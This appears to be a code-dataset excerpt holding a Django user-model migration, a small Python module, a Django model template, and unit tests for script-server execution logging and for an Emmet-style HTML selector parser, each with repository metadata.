# Generated by Django 2.1.15 on 2020-07-05 17:59
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| 50.264706
| 266
| 0.63897
|
8952078bcaa4f85bb92e1fccbf2222a2d363abf3
| 77
|
py
|
Python
|
a/a.py
|
bosichong/17python.com
|
378754e1288b444ab3657093aa18b7e3f03b5145
|
[
"Apache-2.0"
] | 9
|
2017-09-02T05:54:06.000Z
|
2019-04-11T02:34:41.000Z
|
a/a.py
|
bosichong/17python.com
|
378754e1288b444ab3657093aa18b7e3f03b5145
|
[
"Apache-2.0"
] | null | null | null |
a/a.py
|
bosichong/17python.com
|
378754e1288b444ab3657093aa18b7e3f03b5145
|
[
"Apache-2.0"
] | 6
|
2017-10-25T02:47:45.000Z
|
2019-12-21T06:35:01.000Z
|
# coding=utf-8
M_TEST = 888
def print_text():
    print('This is a text-printing function in a.py')
| 11
| 28
| 0.675325
|
eb14086ff15c64e7bfb89902408e5d51db6bbc70
| 780
|
py
|
Python
|
vb_baseapp/management/template_structures/models/basemodel.py
|
vbyazilim/django-vb-baseapp
|
83a62a9d7cb349351ea64aeeb616afe9a94cda5d
|
[
"MIT"
] | null | null | null |
vb_baseapp/management/template_structures/models/basemodel.py
|
vbyazilim/django-vb-baseapp
|
83a62a9d7cb349351ea64aeeb616afe9a94cda5d
|
[
"MIT"
] | 1
|
2021-10-30T16:44:15.000Z
|
2021-10-30T16:44:15.000Z
|
vb_baseapp/management/template_structures/models/basemodel.py
|
vbyazilim/django-vb-baseapp
|
83a62a9d7cb349351ea64aeeb616afe9a94cda5d
|
[
"MIT"
] | null | null | null |
"""
CustomBaseModel template for model generator
"""
TEMPLATE_MODEL_BASEMODEL = """import logging
from django.db import models
from django.utils.translation import ugettext_lazy as _
from console import console
from vb_baseapp.models import CustomBaseModel
__all__ = ['{model_name_for_class}']
logger = logging.getLogger('app')
console = console(source=__name__)
class {model_name_for_class}(CustomBaseModel):
title = models.CharField(max_length=255, verbose_name=_('title'))
class Meta:
app_label = '{app_name}'
verbose_name = _('{model_name_for_verbose_name}')
verbose_name_plural = _('{model_name_for_verbose_name}s') # check pluralization
def __str__(self):
return self.title
"""
__all__ = ['TEMPLATE_MODEL_BASEMODEL']
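# Illustrative sketch (not part of the original module): the model generator is expected to
# fill the placeholders via str.format; the concrete names below are assumed examples.
_EXAMPLE_RENDERED_MODEL = TEMPLATE_MODEL_BASEMODEL.format(
    model_name_for_class='Post',          # assumed class name
    app_name='blog',                      # assumed app label
    model_name_for_verbose_name='post',   # assumed verbose name
)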
| 22.941176
| 88
| 0.739744
|
b760623ef755302886e03e31c2a12ee7fc1ecd9a
| 13,086
|
py
|
Python
|
src/tests/execution_logging_test.py
|
dendisuhubdy/script-server
|
3ffb2e6afdc1672a6ed3e56dcc31ff1794785142
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
src/tests/execution_logging_test.py
|
dendisuhubdy/script-server
|
3ffb2e6afdc1672a6ed3e56dcc31ff1794785142
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
src/tests/execution_logging_test.py
|
dendisuhubdy/script-server
|
3ffb2e6afdc1672a6ed3e56dcc31ff1794785142
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
import os
import unittest
import uuid
from datetime import datetime, timedelta
from execution.logging import ScriptOutputLogger, ExecutionLoggingService, OUTPUT_STARTED_MARKER, \
PostExecutionInfoProvider, LogNameCreator
from react.observable import Observable
from tests import test_utils
from utils import file_utils, audit_utils
from utils.date_utils import get_current_millis, ms_to_datetime, to_millis
class TestScriptOutputLogging(unittest.TestCase):
def test_open(self):
self.output_logger = self.create_logger()
self.output_logger.start()
self.assertTrue(self.is_file_opened())
def test_close(self):
self.output_logger = self.create_logger()
self.output_logger.start()
self.output_stream.close()
self.assertFalse(self.is_file_opened())
def test_simple_log(self):
self.output_logger = self.create_logger()
self.output_logger.start()
self.output_stream.push('some text')
self.output_stream.close()
self.assertEqual(self.read_log(), 'some text')
def test_multiple_logs(self):
self.output_logger = self.create_logger()
self.output_logger.start()
self.output_stream.push('some text')
self.output_stream.push('\nand a new line')
self.output_stream.push(' with some long long text')
self.output_stream.close()
self.assertEqual(self.read_log(), 'some text\nand a new line with some long long text')
def test_log_without_open(self):
self.output_logger = self.create_logger()
self.output_stream.push('some text')
self.assertIsNone(self.read_log())
def test_caret_return(self):
self.output_logger = self.create_logger()
self.output_logger.start()
self.output_stream.push('some text\r')
self.output_stream.push('another text')
self.output_stream.close()
self.assertEqual(self.read_log(), 'some text\ranother text')
def create_logger(self):
self.file_path = os.path.join(test_utils.temp_folder, 'TestScriptOutputLogging.log')
self.logger = ScriptOutputLogger(self.file_path, self.output_stream)
return self.logger
def read_log(self):
if self.file_path and os.path.exists(self.file_path):
return file_utils.read_file(self.file_path, keep_newlines=True)
return None
def is_file_opened(self):
if self.output_logger.log_file:
return not self.output_logger.log_file.closed
return False
def setUp(self):
self.output_stream = Observable()
test_utils.setup()
super().setUp()
def tearDown(self):
self.output_stream.close()
self.output_logger._close()
test_utils.cleanup()
super().tearDown()
def _replace_line_separators(files, original, new):
for file in files:
content = file_utils.read_file(file, byte_content=True)
replaced_content = content.decode('utf-8').replace(original, new).encode('utf-8')
file_utils.write_file(file, replaced_content, byte_content=True)
class TestLoggingService(unittest.TestCase):
def test_no_history_entries(self):
entries = self.logging_service.get_history_entries()
self.assertEqual(0, len(entries))
def test_when_write_log_then_log_file_created(self):
self.simulate_logging()
log_files = self.get_log_files()
self.assertEqual(1, len(log_files))
def test_when_write_log_then_file_content_correct(self):
self.simulate_logging(log_lines=['line 1', 'some text'])
log_file = self.get_log_files()[0]
log_content = self.read_logs_only(log_file)
self.assertEqual('line 1\nsome text\n', log_content)
def test_write_log_with_caret_return(self):
self.simulate_logging(log_lines=['line 1\r', 'some text\r'])
log_file = self.get_log_files()[0]
log_content = self.read_logs_only(log_file)
self.assertEqual('line 1\r\nsome text\r\n', log_content)
def test_when_different_users_then_independent_files(self):
self.simulate_logging(user_name='user1', log_lines=['text for user1'])
self.simulate_logging(user_name='user2', log_lines=['user2 message'])
user1_log_file = self.get_log_files('user1')[0]
self.assertEqual('text for user1\n', self.read_logs_only(user1_log_file))
user2_log_file = self.get_log_files('user2')[0]
self.assertEqual('user2 message\n', self.read_logs_only(user2_log_file))
def test_get_history_entries_when_one(self):
start_time = get_current_millis()
self.simulate_logging(execution_id='id1',
user_name='user1',
script_name='My script',
log_lines=['some text'],
start_time_millis=start_time,
command='./script.sh -p p1 --flag')
entries = self.logging_service.get_history_entries()
self.assertEqual(1, len(entries))
entry = entries[0]
self.validate_history_entry(entry,
id='id1',
user_name='user1',
script_name='My script',
start_time=start_time,
command='./script.sh -p p1 --flag')
def test_no_history_for_wrong_file(self):
log_path = os.path.join(test_utils.temp_folder, 'wrong.log')
file_utils.write_file(log_path, 'log\ntext\n')
logs = self.logging_service.get_history_entries()
self.assertEqual(0, len(logs))
def test_multiline_command_in_history(self):
self.simulate_logging(execution_id='id1', command='./script.sh -p a\nb -p2 "\n\n\n"')
entries = self.logging_service.get_history_entries()
self.assertEqual(1, len(entries))
entry = entries[0]
self.validate_history_entry(entry, id='id1', command='./script.sh -p a\nb -p2 "\n\n\n"')
def test_get_log_by_id(self):
self.simulate_logging(execution_id='id_X', log_lines=['line1', '2', '', 'END'])
log = self.logging_service.find_log('id_X')
self.assertEqual('line1\n2\n\nEND\n', log)
def test_get_log_by_wrong_id(self):
self.simulate_logging(execution_id='1', log_lines=['text'])
log = self.logging_service.find_log('2')
self.assertIsNone(log)
def test_exit_code_in_history(self):
self.exit_codes['1'] = 13
self.simulate_logging(execution_id='1', log_lines=['text'])
entry = self.logging_service.get_history_entries()[0]
self.validate_history_entry(entry, id='1', exit_code=13)
def test_history_entries_after_restart(self):
self.simulate_logging(execution_id='id1')
new_service = ExecutionLoggingService(test_utils.temp_folder, LogNameCreator())
entry = new_service.get_history_entries()[0]
self.validate_history_entry(entry, id='id1')
def test_get_history_entries_after_delete(self):
self.simulate_logging(execution_id='id1')
for file in os.listdir(test_utils.temp_folder):
os.remove(os.path.join(test_utils.temp_folder, file))
entries = self.logging_service.get_history_entries()
self.assertCountEqual([], entries)
def test_find_history_entry_after_delete(self):
self.simulate_logging(execution_id='id1')
for file in os.listdir(test_utils.temp_folder):
os.remove(os.path.join(test_utils.temp_folder, file))
entry = self.logging_service.find_history_entry('id1')
self.assertIsNone(entry)
def test_find_history_entry(self):
self.simulate_logging(execution_id='id1')
entry = self.logging_service.find_history_entry('id1')
self.assertIsNotNone(entry)
self.validate_history_entry(entry, id='id1')
def test_not_find_history_entry(self):
self.simulate_logging(execution_id='id1')
entry = self.logging_service.find_history_entry('id2')
self.assertIsNone(entry)
def test_find_history_entry_after_restart(self):
self.simulate_logging(execution_id='id1')
new_service = ExecutionLoggingService(test_utils.temp_folder, LogNameCreator())
entry = new_service.find_history_entry('id1')
self.assertIsNotNone(entry)
self.validate_history_entry(entry, id='id1')
def test_entry_time_when_timezone(self):
start_time_with_tz = datetime.strptime('2018-04-03T18:25:22+0230', "%Y-%m-%dT%H:%M:%S%z")
self.simulate_logging(execution_id='id1', start_time_millis=to_millis(start_time_with_tz))
entry = self.logging_service.find_history_entry('id1')
self.assertEqual(entry.start_time, start_time_with_tz)
self.assertEqual(entry.start_time.utcoffset(), timedelta(hours=0, minutes=0))
def test_entry_with_user_id_name_different(self):
self.simulate_logging(execution_id='id1', user_name='userX', user_id='192.168.2.12')
entry = self.logging_service.find_history_entry('id1')
self.validate_history_entry(entry, id='id1', user_name='userX', user_id='192.168.2.12')
def test_find_entry_when_windows_line_seperator(self):
self.simulate_logging(execution_id='id1', user_name='userX', user_id='192.168.2.12')
_replace_line_separators(self.get_log_files(), '\n', '\r\n')
entry = self.logging_service.find_history_entry('id1')
self.validate_history_entry(entry, id='id1', user_name='userX', user_id='192.168.2.12')
def test_find_log_when_windows_line_seperator(self):
self.simulate_logging(execution_id='id1', log_lines=['hello', 'wonderful', 'world'])
_replace_line_separators(self.get_log_files(), '\n', '\r\n')
log = self.logging_service.find_log('id1')
self.assertEqual('hello\r\nwonderful\r\nworld\r\n', log)
def validate_history_entry(self, entry, *,
id,
user_name='userX',
user_id=None,
script_name='my_script',
start_time='IGNORE',
command='cmd',
exit_code=0):
if user_id is None:
user_id = user_name
self.assertEqual(id, entry.id)
self.assertEqual(user_name, entry.user_name)
self.assertEqual(user_id, entry.user_id)
self.assertEqual(script_name, entry.script_name)
self.assertEqual(command, entry.command)
if start_time != 'IGNORE':
self.assertEqual(ms_to_datetime(start_time), entry.start_time)
self.assertEqual(exit_code, entry.exit_code)
def read_logs_only(self, log_file):
content = file_utils.read_file(log_file, keep_newlines=True)
self.assertTrue(OUTPUT_STARTED_MARKER in content)
log_start = content.index(OUTPUT_STARTED_MARKER) + len(OUTPUT_STARTED_MARKER) + 1
return content[log_start:]
def simulate_logging(self,
execution_id=None,
user_name='userX',
user_id=None,
script_name='my_script',
command='cmd',
log_lines=None,
start_time_millis=None):
if not execution_id:
execution_id = str(uuid.uuid1())
if user_id is None:
user_id = user_name
output_stream = Observable()
all_audit_names = {audit_utils.AUTH_USERNAME: user_id}
self.logging_service.start_logging(
execution_id,
user_name,
user_id,
script_name,
command,
output_stream,
self.post_info_provider,
all_audit_names,
start_time_millis)
if log_lines:
for line in log_lines:
output_stream.push(line + '\n')
output_stream.close()
@staticmethod
def get_log_files(pattern=None):
files = [os.path.join(test_utils.temp_folder, file)
for file in os.listdir(test_utils.temp_folder)
if file.lower().endswith('.log')]
if pattern:
files = [file for file in files
if pattern in os.path.basename(file)]
return files
def setUp(self):
test_utils.setup()
self.exit_codes = {}
self.post_info_provider = _MapBasedPostExecInfo(self.exit_codes)
self.logging_service = ExecutionLoggingService(test_utils.temp_folder, LogNameCreator())
def tearDown(self):
test_utils.cleanup()
class _MapBasedPostExecInfo(PostExecutionInfoProvider):
def __init__(self, exit_codes):
self.exit_codes = exit_codes
def get_exit_code(self, execution_id):
if execution_id in self.exit_codes:
return self.exit_codes[execution_id]
return 0
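# Rough log-file layout implied by read_logs_only() and the restart tests above
# (an inference from the tests, not a documented format): a metadata header
# (execution id, user, script, command, start time), then the OUTPUT_STARTED_MARKER
# line, then the raw script output returned by find_log().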
| 35.656676
| 99
| 0.647486
|
dda8e80eb203660b07ebb72b3a805c55d3ea3ac7
| 988
|
py
|
Python
|
Model.py
|
yash1996/Emotion-Recognition-by-Facial-features
|
bda21885244e9aac652445cf6349127783384220
|
[
"MIT"
] | 1
|
2018-12-08T10:55:09.000Z
|
2018-12-08T10:55:09.000Z
|
Model.py
|
yash1996/Emotion-Recognition-by-Facial-features
|
bda21885244e9aac652445cf6349127783384220
|
[
"MIT"
] | null | null | null |
Model.py
|
yash1996/Emotion-Recognition-by-Facial-features
|
bda21885244e9aac652445cf6349127783384220
|
[
"MIT"
] | null | null | null |
import keras
import os
from keras.models import model_from_json
import h5py
from keras.models import Sequential, Model
from keras.layers import Dense, LSTM, Activation, Input
from keras.optimizers import adam, rmsprop, adadelta
import numpy as np
from keras.utils import to_categorical
from keras.models import load_model
json_file = open('model.json','r')
x_test = h5py.File('x_val.hdf5','r')
y_test = h5py.File('y_val.hdf5','r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
model.load_weights("weights.hdf5")
print("Loaded model from disk")
print(list(x_test.keys()))
print(list(y_test.keys()))
x_test = x_test['x_val'][:]
y_test = y_test['y_val'][:]
y_test = to_categorical(y_test)
print(x_test[0],x_test[1])
print(y_test[0],y_test[1])
#a = model.get_config()
#print("model config is ",a)
model.compile(optimizer='rmsprop', loss='mse')
# with no metrics specified, evaluate() returns the compiled MSE loss rather than a classification accuracy
accuracy = model.evaluate(x_test, y_test)
print('accuracy', accuracy)
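# Sketch of how a real accuracy metric could be reported instead of the MSE loss
# (assumes a classification-style output; not part of the original script):
#
#     model.compile(optimizer='rmsprop', loss='mse', metrics=['accuracy'])
#     loss_value, acc = model.evaluate(x_test, y_test)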
| 32.933333
| 56
| 0.742915
|
3f2a695a3b73ff35dcf4fbca9b1923480a560837
| 321
|
py
|
Python
|
exonum_precheck/__main__.py
|
popzxc/exonum_precheck
|
8a109f44333e9a0f5425fd1cf1796bb6705a3167
|
[
"MIT"
] | 1
|
2019-09-10T13:14:32.000Z
|
2019-09-10T13:14:32.000Z
|
exonum_precheck/__main__.py
|
popzxc/exonum_precheck
|
8a109f44333e9a0f5425fd1cf1796bb6705a3167
|
[
"MIT"
] | null | null | null |
exonum_precheck/__main__.py
|
popzxc/exonum_precheck
|
8a109f44333e9a0f5425fd1cf1796bb6705a3167
|
[
"MIT"
] | null | null | null |
import argparse
from exonum_precheck import run_check
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog="exonum_precheck", description="Exonum deployment precheck script")
parser.add_argument('--jobs', nargs='*', default=['unit-test', 'lints'])
args = parser.parse_args()
run_check(args)
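# Invocation sketch (derived from the argparse definition above):
#
#     python -m exonum_precheck                   # runs the default jobs: unit-test, lints
#     python -m exonum_precheck --jobs unit-test  # runs only the unit-test job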
| 32.1
| 109
| 0.728972
|
ebf47ab45dfdb750c1ecffb29d0acb2d0bec2259
| 1,422
|
py
|
Python
|
var/spack/repos/builtin/packages/rockstar/package.py
|
nkianggiss/spack
|
3477d3375142a30f5714bb5966a6d8bb22c33c06
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 3
|
2019-06-27T13:26:50.000Z
|
2019-07-01T16:24:54.000Z
|
var/spack/repos/builtin/packages/rockstar/package.py
|
openbiox/spack
|
bb6ec7fb40c14b37e094a860e3625af53f633174
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 75
|
2016-07-27T11:43:00.000Z
|
2020-12-08T15:56:53.000Z
|
var/spack/repos/builtin/packages/rockstar/package.py
|
openbiox/spack
|
bb6ec7fb40c14b37e094a860e3625af53f633174
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 8
|
2015-10-16T13:51:49.000Z
|
2021-10-18T13:58:03.000Z
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
from spack import *
class Rockstar(MakefilePackage):
"""The Rockstar Halo Finder"""
homepage = "https://bitbucket.org/gfcstanford/rockstar"
version('develop', git='https://bitbucket.org/gfcstanford/rockstar.git')
version('yt', hg='https://bitbucket.org/MatthewTurk/rockstar')
variant('hdf5', description='Build rockstar with HDF5 support', default=False)
patch('adjust_buildscript.patch')
depends_on('hdf5', when='+hdf5')
def build(self, spec, prefix):
# Set environment appropriately for HDF5
if '+hdf5' in spec:
os.environ['HDF5_INC_DIR'] = spec['hdf5'].prefix.include
os.environ['HDF5_LIB_DIR'] = spec['hdf5'].prefix.lib
# Build depending on whether hdf5 is to be used
if '+hdf5' in spec:
make('with_hdf5')
else:
make()
# Build rockstar library
make('lib')
def install(self, spec, prefix):
# Install all files and directories
install_tree('.', prefix)
mkdir(prefix.bin)
mkdir(prefix.lib)
install('rockstar', join_path(prefix.bin, 'rockstar'))
install('librockstar.so', join_path(prefix.lib, 'librockstar.so'))
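# Usage sketch (standard Spack CLI, not part of the recipe itself):
#
#     spack install rockstar          # plain build
#     spack install rockstar +hdf5    # enables the 'hdf5' variant declared above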
| 29.625
| 82
| 0.647679
|
23ab4e5cf331c09b9454605f124656d3c58735d4
| 4,520
|
py
|
Python
|
azext_iot/sdk/dps/service/models/device_registration_state.py
|
jongio/azure-iot-cli-extension
|
5e41824688c4d9e4593737a55e8789a6bb1d2411
|
[
"MIT"
] | null | null | null |
azext_iot/sdk/dps/service/models/device_registration_state.py
|
jongio/azure-iot-cli-extension
|
5e41824688c4d9e4593737a55e8789a6bb1d2411
|
[
"MIT"
] | null | null | null |
azext_iot/sdk/dps/service/models/device_registration_state.py
|
jongio/azure-iot-cli-extension
|
5e41824688c4d9e4593737a55e8789a6bb1d2411
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DeviceRegistrationState(Model):
"""Device registration state.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar registration_id: This id is used to uniquely identify a device
registration of an enrollment.
A case-insensitive string (up to 128 characters long) of alphanumeric
characters plus certain special characters : . _ -. No special characters
allowed at start or end.
:vartype registration_id: str
:ivar created_date_time_utc: Registration create date time (in UTC).
:vartype created_date_time_utc: datetime
:ivar assigned_hub: Assigned Azure IoT Hub.
:vartype assigned_hub: str
:ivar device_id: Device ID.
:vartype device_id: str
:ivar status: Enrollment status. Possible values include: 'unassigned',
'assigning', 'assigned', 'failed', 'disabled'
:vartype status: str or ~dps.models.enum
:ivar substatus: Substatus for 'Assigned' devices. Possible values include
- 'initialAssignment': Device has been assigned to an IoT hub for the
first time, 'deviceDataMigrated': Device has been assigned to a different
IoT hub and its device data was migrated from the previously assigned IoT
hub. Device data was removed from the previously assigned IoT hub,
'deviceDataReset': Device has been assigned to a different IoT hub and
its device data was populated from the initial state stored in the
enrollment. Device data was removed from the previously assigned IoT hub,
'reprovisionedToInitialAssignment': Device has been re-provisioned to a
previously assigned IoT hub. Possible values include: 'initialAssignment',
'deviceDataMigrated', 'deviceDataReset',
'reprovisionedToInitialAssignment'
:vartype substatus: str or ~dps.models.enum
:ivar error_code: Error code.
:vartype error_code: int
:ivar error_message: Error message.
:vartype error_message: str
:ivar last_updated_date_time_utc: Last updated date time (in UTC).
:vartype last_updated_date_time_utc: datetime
:ivar etag: The entity tag associated with the resource.
:vartype etag: str
:ivar payload: Custom allocation payload returned from the webhook to the
device.
:vartype payload: object
"""
_validation = {
'registration_id': {'readonly': True},
'created_date_time_utc': {'readonly': True},
'assigned_hub': {'readonly': True},
'device_id': {'readonly': True},
'status': {'readonly': True},
'substatus': {'readonly': True},
'error_code': {'readonly': True},
'error_message': {'readonly': True},
'last_updated_date_time_utc': {'readonly': True},
'etag': {'readonly': True},
'payload': {'readonly': True},
}
_attribute_map = {
'registration_id': {'key': 'registrationId', 'type': 'str'},
'created_date_time_utc': {'key': 'createdDateTimeUtc', 'type': 'iso-8601'},
'assigned_hub': {'key': 'assignedHub', 'type': 'str'},
'device_id': {'key': 'deviceId', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'substatus': {'key': 'substatus', 'type': 'str'},
'error_code': {'key': 'errorCode', 'type': 'int'},
'error_message': {'key': 'errorMessage', 'type': 'str'},
'last_updated_date_time_utc': {'key': 'lastUpdatedDateTimeUtc', 'type': 'iso-8601'},
'etag': {'key': 'etag', 'type': 'str'},
'payload': {'key': 'payload', 'type': 'object'},
}
def __init__(self, **kwargs):
super(DeviceRegistrationState, self).__init__(**kwargs)
self.registration_id = None
self.created_date_time_utc = None
self.assigned_hub = None
self.device_id = None
self.status = None
self.substatus = None
self.error_code = None
self.error_message = None
self.last_updated_date_time_utc = None
self.etag = None
self.payload = None
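# Minimal sketch (not part of the generated model): every field is read-only and
# server-populated, so a locally constructed instance is empty until it is
# deserialized from a Device Provisioning Service response.
#
#     state = DeviceRegistrationState()
#     state.registration_id  # -> None until populated by the service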
| 43.883495
| 92
| 0.647345
|
efd89ab243bfd8d4c0da2f2cfebdcbc740e3927e
| 8,603
|
py
|
Python
|
test/test_emmetNode.py
|
Ariyn/crawling-script
|
0757e1fe71c66cac60331b630f927b8ab6114a97
|
[
"MIT"
] | null | null | null |
test/test_emmetNode.py
|
Ariyn/crawling-script
|
0757e1fe71c66cac60331b630f927b8ab6114a97
|
[
"MIT"
] | 7
|
2016-10-30T17:02:33.000Z
|
2018-12-08T18:40:33.000Z
|
test/test_emmetNode.py
|
Ariyn/crawling-script
|
0757e1fe71c66cac60331b630f927b8ab6114a97
|
[
"MIT"
] | null | null | null |
import unittest
import unittest.mock as mock
from unittest.mock import MagicMock, mock_open
import os
import logging
import src.EmmetNode as nsp
from src.Emmet import Emmet
from src.HTML import Element, MyHTMLParser
from src.tools import Log
class Tester(unittest.TestCase):
debug = False
scripts = [
"tag1> tag2",
"[ abc := def , ghi := jkl ]",
"{ abc := def , ghi := jkl }",
"tag1>ul>(li>span[nth-sibling:=2]{title:= body})+(li>span[nth-sibling:=2]{author:=body})",
"div>ul>(li[test:=1]>span)+(li[test:=2]>span)>sdf",
"div#test.test1.test2{map:=data-map, list:=data-list}",
"div#test>span{title:=body}",
"t1>(t2>t3>t4+t5)+(t3>t4+t5)",
"t1[attr-index:=0]>(t3>t4)+(t3>t4>t5)",
"article.Story--large.Story--stagger.p-2.Story>a>div>img.d-block{image:=src}"
]
html = [
"<div id='test'>"
]
elements = [Element("tag1"), Element("ul"), Element("li"), Element("span",[
("body","testTitle")
]),Element("li"), Element("span",[
("body","testAuthor")
])]
@staticmethod
def setUpClass():
format = "%(asctime)-15s %(message)s %(datas)s"
Log.format = format
Log.debug = Tester.debug
Tester.logger = Log()
Tester.log = Tester.logger.log
def setUp(self):
pass
# @unittest.skip("for test")
def test_condition_expression(self):
s = nsp.conditionExp.search(Tester.scripts[1])
if s:
s = [nsp.allocationExp.search(i.strip()) for i in s.group(1).split(",")]
s = [i.groups() if i else i for i in s]
Tester.log.info(msg="condition parse done", extra={"datas":str(s)})
# @unittest.skip("for test")
def test_capture_expression(self):
s = nsp.captureExp.search(Tester.scripts[2])
if s:
s = [nsp.allocationExp.search(i.strip()) for i in s.group(1).split(",")]
s = [i.groups() if i else i for i in s]
Tester.log.info(msg="capture parse done", extra={"datas":str(s)})
# @unittest.skip("for test")
def test_split_token(self):
nsp.splitToken(self.scripts[0])
# @unittest.skip("for test")
def test_complex_script_split_token(self):
nsp.splitToken(self.scripts[3])
# @unittest.skip("for test")
def test_complex_script_parse(self):
tokens = nsp.splitToken(self.scripts[3])
root = nsp.parse(tokens)
# @unittest.skip("for test")
def test_complex_script_plus_order(self):
tokens = nsp.splitToken(self.scripts[4])
root = nsp.parse(tokens)
div = root.children[0]
# print(div, div.condition, div.capture, div.raw)
root.travel()
# @unittest.skip("for test")
def test_emmet_node_match(self):
tokens = nsp.splitToken(self.scripts[5])
root = nsp.parse(tokens)
tag = root.travel()
# @unittest.skip("for test")
def test_check_emmet(self):
tokens = nsp.splitToken(self.scripts[5])
root = nsp.parse(tokens).children[0]
e = Element("div", [
("id","test"),
("class", "test1 test2"),
("data-map","NY"),
("data-list","p1,p2,p3")
])
self.assertTrue(root.match(e))
e2 = Element("div", [
("id","test2"),
("class", "test1 test2"),
("data-map","NY"),
("data-list","p1,p2,p3")
])
self.assertFalse(root.match(e2))
# if root.match(e):
# x = root.capture(e)
# print(x)
def test_newStyle_node_iteration(self):
e = Emmet(self.scripts[3])
back = False
strs = []
for i in e:
strs.append(i.tag)
if i.tag == "ul" and not back:
e.index -= 1
back = True
self.assertEqual(" ".join(strs), "tag1 ul ul li span li span")
@unittest.skip("for test")
def test_emmet_newStyle_check(self):
elements = [Element("tag1"), Element("ul"), Element("li"), Element("span",[
("body","testestset")
]),Element("li"), Element("span",[
("body","testestset")
])]
emmetEngine = Emmet(self.scripts[3])
for ele in elements:
x = emmetEngine.check(ele)
# if not x:
# print("element not passed", ele)
self.assertTrue(x)
@unittest.skip("for test")
def test_emmet_newStyle_check_right_elements(self):
e = self.elements
operation = [
(e[0], False),
(e[1], False),
(e[2], False),
(e[3], False),
(e[3], True),
(e[2], True),
(e[4], False),
(e[5], False),
(e[5], True),
(e[4], True),
(e[1], True),
(e[0], True)
]
emmetEngine = Emmet(self.scripts[3])
for i in range(2):
for element, endTag in operation:
x = emmetEngine.check(element, endTag=endTag)
self.assertEqual({"title":"testTitle", "author":"testAuthor"}, emmetEngine.captures[0])
@unittest.skip("for test")
def test_emmet_newStyle_check_wrong_elements(self):
e = self.elements
wrongElement = Element("li2")
operation = [
(e[0], False),
(e[1], False),
(e[2], False),
(e[3], False),
(e[3], True),
(e[2], True),
(wrongElement, False),
(e[5], False),
(e[5], True),
(wrongElement, True),
(e[1], True),
(e[0], True)
]
emmetEngine = Emmet(self.scripts[3])
for i in range(2):
for element, endTag in operation:
x = emmetEngine.check(element, endTag=endTag)
self.assertEqual([], emmetEngine.captures)
@unittest.skip("for test")
def test_emmet_newStyle_check_right_but_many_parent_elements(self):
e = self.elements
wrongElement = Element("li2")
operation = [
(wrongElement, False),
(e[0], False),
(e[1], False),
(e[2], False),
(e[3], False),
(e[3], True),
(e[2], True),
(e[4], False),
(e[5], False),
(e[5], True),
(e[4], True),
(e[1], True),
(e[0], True),
(wrongElement, True)
]
emmetEngine = Emmet(self.scripts[3])
for i in range(2):
for element, endTag in operation:
x = emmetEngine.check(element, endTag=endTag)
self.assertEqual({"title":"testTitle", "author":"testAuthor"}, emmetEngine.captures[0])
@unittest.skip("for test")
def test_emmet_newStyle_check_right_but_wrong_siblings_elements(self):
# print("\ntest_emmet_newStyle_check_right_but_wrong_siblings_elements")
e = self.elements
wrongElement = Element("li2")
operation = [
(e[0], False),
(e[1], False),
(e[2], False),
(e[3], False),
(e[3], True),
(e[2], True),
(wrongElement, False),
(wrongElement, True),
(e[4], False),
(e[5], False),
(e[5], True),
(e[4], True),
(e[1], True),
(e[0], True)
]
emmetEngine = Emmet(self.scripts[3])
indent = 0
for i in operation:
# print((" "*indent+"<%s>" if not i[1] else " "*(indent-1)+"</%s>")%i[0].tag)
if i[1]:
indent -= 1
else:
indent += 1
for element, endTag in operation:
x = emmetEngine.check(element, endTag=endTag)
self.assertEqual({"title":"testTitle", "author":"testAuthor"}, emmetEngine.captures[0])
@unittest.skip("for test")
def test_emmet_newStyle_check_just_wrong_elements(self):
# print("\ntest_emmet_newStyle_check_just_wrong_elements")
e = self.elements
wrongElement = Element("li2")
operation = [
(e[0], False),
(e[1], False),
(e[2], False),
(e[3], False),
(e[3], True),
(e[2], True),
(e[4], False),
(e[5], False),
(wrongElement, False),
(wrongElement, True),
(e[5], True),
(e[4], True),
(e[1], True),
(e[0], True)
]
emmetEngine = Emmet(self.scripts[3])
indent = 0
for i in operation:
# print((" "*indent+"<%s>" if not i[1] else " "*(indent-1)+"</%s>")%i[0].tag)
if i[1]:
indent -= 1
else:
indent += 1
for element, endTag in operation:
x = emmetEngine.check(element, endTag=endTag)
self.assertEqual([], emmetEngine.captures)
@unittest.skip("test skip")
def test_tree_list_maker(self):
emmetEngine = Emmet(self.scripts[7])
self.assertTrue(4 in emmetEngine.treeDict)
@unittest.skip("test skip")
def test_traverse_tree(self):
emmetEngine = Emmet(self.scripts[7])
x = [emmetEngine.traverseTree().tag for i in range(8)]
